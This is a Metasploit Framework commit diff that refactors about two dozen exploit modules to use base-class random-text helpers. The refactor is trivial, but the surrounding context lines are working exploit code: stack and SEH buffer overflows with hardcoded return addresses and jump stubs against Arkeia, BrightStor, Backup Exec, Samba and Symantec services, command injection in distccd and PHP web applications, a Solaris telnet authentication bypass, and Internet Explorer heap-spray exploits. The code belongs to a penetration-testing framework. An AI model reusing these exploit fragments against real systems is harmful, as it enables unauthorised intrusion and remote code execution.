updated modules to use base class rand_xxx methods
git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
cfd9cbb1f1
commit
d42194e14a
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
print_status("Sending our job request with embedded command string...")
|
print_status("Sending our job request with embedded command string...")
|
||||||
# Send the job request with the encoded command
|
# Send the job request with the encoded command
|
||||||
sock.put(
|
sock.put(
|
||||||
"\x02" + Rex::Text.rand_text_alphanumeric(3) + jid +
|
"\x02" + rand_text_alphanumeric(3) + jid +
|
||||||
"`" + payload.encoded + "`\n"
|
"`" + payload.encoded + "`\n"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -85,7 +85,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Sending our fake control file...")
|
print_status("Sending our fake control file...")
|
||||||
sock.put("\x02 32 cfA" + Rex::Text.rand_text_alphanumeric(8) + "\n")
|
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
|
||||||
res = sock.get_once(1)
|
res = sock.get_once(1)
|
||||||
if (res[0] != 0)
|
if (res[0] != 0)
|
||||||
print_status("The target did not accept our control file")
|
print_status("The target did not accept our control file")
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
print_status("Forcing an error and hijacking the cleanup routine...")
|
print_status("Forcing an error and hijacking the cleanup routine...")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
sock.put(Rex::Text.rand_text_alphanumeric(16384))
|
sock.put(rand_text_alphanumeric(16384))
|
||||||
disconnect
|
disconnect
|
||||||
rescue
|
rescue
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -58,7 +58,7 @@ class Exploits::Linux::Http::PeerCast_URL < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(780)
|
pat = rand_text_alphanumeric(780)
|
||||||
pat << [target.ret].pack('V')
|
pat << [target.ret].pack('V')
|
||||||
pat << payload.encoded
|
pat << payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
|
|
||||||
# Add the user type and afp path
|
# Add the user type and afp path
|
||||||
afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
|
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
|
||||||
afp << "\x03" + [path.length].pack('n') + path
|
afp << "\x03" + [path.length].pack('n') + path
|
||||||
|
|
||||||
sock.write(afp)
|
sock.write(afp)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -99,7 +99,7 @@ class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||||
head[6, 2] = [1200].pack('n')
|
head[6, 2] = [1200].pack('n')
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1200, payload_badchars)
|
buf = rand_text_english(1200, payload_badchars)
|
||||||
|
|
||||||
# Return back to the stack either directly or via system lib
|
# Return back to the stack either directly or via system lib
|
||||||
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -75,9 +75,9 @@ class Exploits::Osx::Browser::Safar_Metadata_Archive < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_zip(shellcode)
|
def generate_zip(shellcode)
|
||||||
tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'
|
tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'
|
||||||
tnam = Rex::Text.rand_text_alphanumeric(8)
|
tnam = rand_text_alphanumeric(8)
|
||||||
tdir += '/' + tnam
|
tdir += '/' + tnam
|
||||||
tmov = Rex::Text.rand_text_alphanumeric(8) + '.mov'
|
tmov = rand_text_alphanumeric(8) + '.mov'
|
||||||
|
|
||||||
FileUtils.mkdir(tdir, :mode => 0755)
|
FileUtils.mkdir(tdir, :mode => 0755)
|
||||||
FileUtils.cd(tdir)
|
FileUtils.cd(tdir)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -96,7 +96,7 @@ class Exploits::Osx::Ftp::WebStarFTPUserOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
# r1+120 = 408
|
# r1+120 = 408
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
||||||
buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
|
buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
|
||||||
buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
|
buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
|
||||||
buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
|
buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -78,7 +78,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
|
||||||
smb_login
|
smb_login
|
||||||
|
|
||||||
# 1988 is required for findrecv shellcode
|
# 1988 is required for findrecv shellcode
|
||||||
pattern = Rex::Text.rand_text_english(1988)
|
pattern = rand_text_english(1988)
|
||||||
|
|
||||||
# This stream covers the framepointer and the return address
|
# This stream covers the framepointer and the return address
|
||||||
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Solaris::Samba::Trans2Open_Overflow < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||||
pattern = Rex::Text.rand_text_english(1988)
|
pattern = rand_text_english(1988)
|
||||||
|
|
||||||
#
|
#
|
||||||
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
|
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,7 +69,7 @@ class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote
|
||||||
|
|
||||||
if !datastore['HOSTNAME']
|
if !datastore['HOSTNAME']
|
||||||
print_status('attempting to determine hostname')
|
print_status('attempting to determine hostname')
|
||||||
response = sadmind_request(Rex::Text.rand_text_alpha(rand(10) + 1), "true")
|
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
|
||||||
|
|
||||||
if !response
|
if !response
|
||||||
print_error('no response')
|
print_error('no response')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -81,7 +81,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
"\xff\xfa\x27\x00" +
|
"\xff\xfa\x27\x00" +
|
||||||
"\x00TTYPROMPT" +
|
"\x00TTYPROMPT" +
|
||||||
"\x01" +
|
"\x01" +
|
||||||
Rex::Text.rand_text_alphanumeric(6) +
|
rand_text_alphanumeric(6) +
|
||||||
"\xff\xf0"
|
"\xff\xf0"
|
||||||
|
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
@ -91,7 +91,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
|
|
||||||
req = datastore['USER']
|
req = datastore['USER']
|
||||||
64.times {
|
64.times {
|
||||||
req += Rex::Text.rand_text(rand(10) + 1, '', " \t") + Rex::Text.rand_text_alpha(rand(10) + 1)
|
req += rand_text(rand(10) + 1, '', " \t") + rand_text_alpha(rand(10) + 1)
|
||||||
}
|
}
|
||||||
req += "\n"
|
req += "\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Unix::Misc::DISTCCD_EXEC < Msf::Exploit::Remote
|
||||||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||||
sock.put(distcmd)
|
sock.put(distcmd)
|
||||||
|
|
||||||
dtag = Rex::Text.rand_text_alphanumeric(10)
|
dtag = rand_text_alphanumeric(10)
|
||||||
sock.put("DOTI0000000A#{dtag}\n")
|
sock.put("DOTI0000000A#{dtag}\n")
|
||||||
|
|
||||||
res = sock.get_once(24, 5)
|
res = sock.get_once(24, 5)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -63,7 +63,7 @@ class Exploits::Unix::Webapp::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def go(command)
|
def go(command)
|
||||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||||
|
|
||||||
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
||||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,17 +66,17 @@ class Exploits::Unix::Webapp::PhpXmlrpcEval < Msf::Exploit::Remote
|
||||||
def go(command)
|
def go(command)
|
||||||
|
|
||||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||||
|
|
||||||
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
||||||
|
|
||||||
xml =
|
xml =
|
||||||
'<?xml version="1.0"?>' +
|
'<?xml version="1.0"?>' +
|
||||||
"<methodCall>" +
|
"<methodCall>" +
|
||||||
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||||
"<params><param>" +
|
"<params><param>" +
|
||||||
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||||
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||||
"</param></params>" +
|
"</param></params>" +
|
||||||
"</methodCall>";
|
"</methodCall>";
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,18 +70,18 @@ class Exploits::Windows::Antivirus::Symantec_Rtvscan < Msf::Exploit::Remote
|
||||||
header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
|
header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
|
||||||
header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"
|
header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"
|
||||||
|
|
||||||
crufta = Rex::Text.rand_text_alphanumeric(512)
|
crufta = rand_text_alphanumeric(512)
|
||||||
cruftb = Rex::Text.rand_text_alphanumeric(514)
|
cruftb = rand_text_alphanumeric(514)
|
||||||
cruftc = payload.encoded + Rex::Text.rand_text_alphanumeric(513 - payload.encoded.length)
|
cruftc = payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
|
||||||
cruftd = Rex::Text.rand_text_alphanumeric(495)
|
cruftd = rand_text_alphanumeric(495)
|
||||||
|
|
||||||
cruftd[479, 2] = "\xeb\x06"
|
cruftd[479, 2] = "\xeb\x06"
|
||||||
cruftd[483, 4] = [target.ret].pack('V')
|
cruftd[483, 4] = [target.ret].pack('V')
|
||||||
cruftd[487, 5] = [0xe8, -1000].pack('CV')
|
cruftd[487, 5] = [0xe8, -1000].pack('CV')
|
||||||
|
|
||||||
cruftd << Rex::Text.rand_text_alphanumeric(21)
|
cruftd << rand_text_alphanumeric(21)
|
||||||
crufte = Rex::Text.rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
crufte = rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
||||||
crufte << Rex::Text.rand_text_alphanumeric(504) + "\x00\x00"
|
crufte << rand_text_alphanumeric(504) + "\x00\x00"
|
||||||
|
|
||||||
overflow = [ crufta.length ].pack('v') + crufta
|
overflow = [ crufta.length ].pack('v') + crufta
|
||||||
overflow << [ cruftb.length ].pack('v') + cruftb
|
overflow << [ cruftb.length ].pack('v') + cruftb
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -113,7 +113,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def prep_ark5
|
def prep_ark5
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
data = rand_text_english(4096, payload_badchars)
|
||||||
data[1176, 4] = [target['Rets'][0]].pack('V')
|
data[1176, 4] = [target['Rets'][0]].pack('V')
|
||||||
data[1172, 2] = "\xeb\xf9"
|
data[1172, 2] = "\xeb\xf9"
|
||||||
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
||||||
|
@ -121,7 +121,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def prep_ark4
|
def prep_ark4
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
data = rand_text_english(4096, payload_badchars)
|
||||||
seh = generate_seh_payload( target['Rets'][0] )
|
seh = generate_seh_payload( target['Rets'][0] )
|
||||||
data[ 96, seh.length] = seh
|
data[ 96, seh.length] = seh
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Rem
|
||||||
resp = ndmp_recv()
|
resp = ndmp_recv()
|
||||||
|
|
||||||
username = 'X' * 512
|
username = 'X' * 512
|
||||||
password = Rex::Text.rand_text_alphanumeric(8192)
|
password = rand_text_alphanumeric(8192)
|
||||||
|
|
||||||
# Place our payload early in the request and jump backwards into it
|
# Place our payload early in the request and jump backwards into it
|
||||||
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||||
|
|
|
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4096)
|
buf = rand_text_english(4096)
|
||||||
|
|
||||||
# Overwriting the return address works well, but the only register
|
# Overwriting the return address works well, but the only register
|
||||||
# pointing back to our code is 'esp'. The following stub overwrites
|
# pointing back to our code is 'esp'. The following stub overwrites
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
|
||||||
# 3168 == return address
|
# 3168 == return address
|
||||||
# 3172 == esp @ 0293ff8c (2476 from good data)
|
# 3172 == esp @ 0293ff8c (2476 from good data)
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(3288, payload_badchars)
|
buf = rand_text_english(3288, payload_badchars)
|
||||||
buf[ 696, payload.encoded.length ] = payload.encoded
|
buf[ 696, payload.encoded.length ] = payload.encoded
|
||||||
buf[3168, 4] = [target.ret].pack('V') # jmp esp
|
buf[3168, 4] = [target.ret].pack('V') # jmp esp
|
||||||
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
|
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -96,11 +96,11 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# Build out the HTML response page
|
# Build out the HTML response page
|
||||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_html = rand_text_alpha(rand(30)+2)
|
||||||
var_func_exploit = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_exploit = rand_text_alpha(rand(30)+2);
|
||||||
var_func_go = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_go = rand_text_alpha(rand(30)+2);
|
||||||
var_func_createo = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_createo = rand_text_alpha(rand(30)+2);
|
||||||
var_exe_name = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_exe_name = rand_text_alpha(rand(30)+2);
|
||||||
var_objects = ''
|
var_objects = ''
|
||||||
|
|
||||||
# Build the object list based on target selection
|
# Build the object list based on target selection
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
# Create the overflow string
|
# Create the overflow string
|
||||||
pattern = Rex::Text.rand_text_alpha(8192)
|
pattern = rand_text_alpha(8192)
|
||||||
|
|
||||||
# Smash the return address with a bogus pointer
|
# Smash the return address with a bogus pointer
|
||||||
pattern[744, 4] = [0xffffffff].pack('V')
|
pattern[744, 4] = [0xffffffff].pack('V')
|
||||||
|
@ -72,8 +72,8 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
# Build out the HTML response page
|
# Build out the HTML response page
|
||||||
var_client = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_client = rand_text_alpha(rand(30)+2)
|
||||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_html = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
content = %Q|
|
content = %Q|
|
||||||
<html >
|
<html >
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,18 +89,18 @@ class Exploits::Windows::Browser::McAfeeMcSubMgrVsprintf < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Build out our overflow buffer
|
# Build out our overflow buffer
|
||||||
buf =
|
buf =
|
||||||
Rex::Text.rand_text(2972, payload_badchars) +
|
rand_text(2972, payload_badchars) +
|
||||||
[ ret ].pack('V') +
|
[ ret ].pack('V') +
|
||||||
"\x60" + # pusha
|
"\x60" + # pusha
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x61" + # popa
|
"\x61" + # popa
|
||||||
p.encoded
|
p.encoded
|
||||||
|
|
||||||
# Generate random variable names
|
# Generate random variable names
|
||||||
vname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
vname = rand_text_alpha(rand(100) + 1)
|
||||||
strname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
strname = rand_text_alpha(rand(100) + 1)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content =
|
content =
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,7 +66,7 @@ class Exploits::Windows::Browser::Mirc_Irc_Url < Msf::Exploit::Remote
|
||||||
# Re-generate the payload
|
# Re-generate the payload
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_alphanumeric(target['Offset'], payload_badchars)
|
filler = rand_text_alphanumeric(target['Offset'], payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit = filler + seh
|
sploit = filler + seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -98,7 +98,7 @@ class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
|
||||||
content =
|
content =
|
||||||
"<html>" + egg + egg + p.encoded + "\n" +
|
"<html>" + egg + egg + p.encoded + "\n" +
|
||||||
"<object type=\"////////////////////////////////////////////////////////////////" +
|
"<object type=\"////////////////////////////////////////////////////////////////" +
|
||||||
Rex::Text.rand_text_alphanumeric(8) + ret + clean +
|
rand_text_alphanumeric(8) + ret + clean +
|
||||||
make_nops(8) + hunter[0] + "\">" +
|
make_nops(8) + hunter[0] + "\">" +
|
||||||
"</object>" +
|
"</object>" +
|
||||||
"</html>"
|
"</html>"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
html =
|
html =
|
||||||
"<html><meta http-equiv='refresh' content='0; URL=" +
|
"<html><meta http-equiv='refresh' content='0; URL=" +
|
||||||
get_resource + '/' +
|
get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
rand_text_alphanumeric(rand(80)+16) +
|
||||||
".#{ext}'><body>One second please...</body></html>"
|
".#{ext}'><body>One second please...</body></html>"
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
return
|
return
|
||||||
|
@ -178,7 +178,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
#
|
#
|
||||||
# Some extra fun padding
|
# Some extra fun padding
|
||||||
#
|
#
|
||||||
Rex::Text.rand_text(rand(16384)+1024)
|
rand_text(rand(16384)+1024)
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
@ -190,13 +190,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
case type
|
case type
|
||||||
when 0
|
when 0
|
||||||
# CreatePenIndirect
|
# CreatePenIndirect
|
||||||
return [8, 0x02fa].pack('Vv') + Rex::Text.rand_text(10)
|
return [8, 0x02fa].pack('Vv') + rand_text(10)
|
||||||
when 1
|
when 1
|
||||||
# CreateBrushIndirect
|
# CreateBrushIndirect
|
||||||
return [7, 0x02fc].pack('Vv') + Rex::Text.rand_text(8)
|
return [7, 0x02fc].pack('Vv') + rand_text(8)
|
||||||
else
|
else
|
||||||
# Rectangle
|
# Rectangle
|
||||||
return [7, 0x041b].pack('Vv') + Rex::Text.rand_text(8)
|
return [7, 0x041b].pack('Vv') + rand_text(8)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -84,24 +84,24 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
|
||||||
nops = Rex::Text.to_unescape(make_nops(4))
|
nops = Rex::Text.to_unescape(make_nops(4))
|
||||||
|
|
||||||
# Generate a random XML namespace for VML
|
# Generate a random XML namespace for VML
|
||||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
xmlns = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
rnd = rand(3)
|
rnd = rand(3)
|
||||||
var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
|
var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
|
||||||
var_inp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_inp = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_tmp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_tmp = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_payload = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_payload = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_nopslide = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_nopslide = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_slidesize = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_slidesize = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_fillblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_fillblock = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_memblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_memblock = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_heap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_heap = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_index = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_index = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_maxIndex = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_maxIndex = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_fillHeap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_fillHeap = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_start = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_start = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_timer = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
